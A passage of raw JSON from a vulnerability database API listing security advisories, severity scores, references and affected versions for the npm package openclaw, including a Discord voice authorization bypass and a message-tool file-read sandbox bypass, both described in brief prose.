"vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41300", "GHSA-9f4w-67g7-mqwv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-26kp-dbu2-pqej" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89601?format=api", "vulnerability_id": "VCID-26sg-e29u-hkf3", "summary": "OpenClaw: Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n## Summary\nDiscord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n\n## Current Maintainer Triage\n- Status: narrow\n- Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\nOpenClaw thanks @cyjhhh for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41382", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41382" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41382", "reference_id": "CVE-2026-41382", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41382" }, { "reference_url": "https://github.com/advisories/GHSA-x2m8-53h4-6hch", "reference_id": "GHSA-x2m8-53h4-6hch", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x2m8-53h4-6hch" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps", "reference_id": "openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41382", "GHSA-x2m8-53h4-6hch" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-26sg-e29u-hkf3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91252?format=api", "vulnerability_id": "VCID-26sv-grsd-abcw", "summary": "Duplicate Advisory: OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-v8wv-jg3q-qwpq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.24 contains a sandbox bypass vulnerability in the message tool that allows attackers to read arbitrary local files by using mediaUrl and fileUrl alias parameters that bypass localRoots validation. Remote attackers can exploit this by routing file requests through unvalidated alias parameters to access files outside the intended sandbox directory.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters" }, { "reference_url": "https://github.com/advisories/GHSA-3gr8-2752-h46q", "reference_id": "GHSA-3gr8-2752-h46q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3gr8-2752-h46q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { 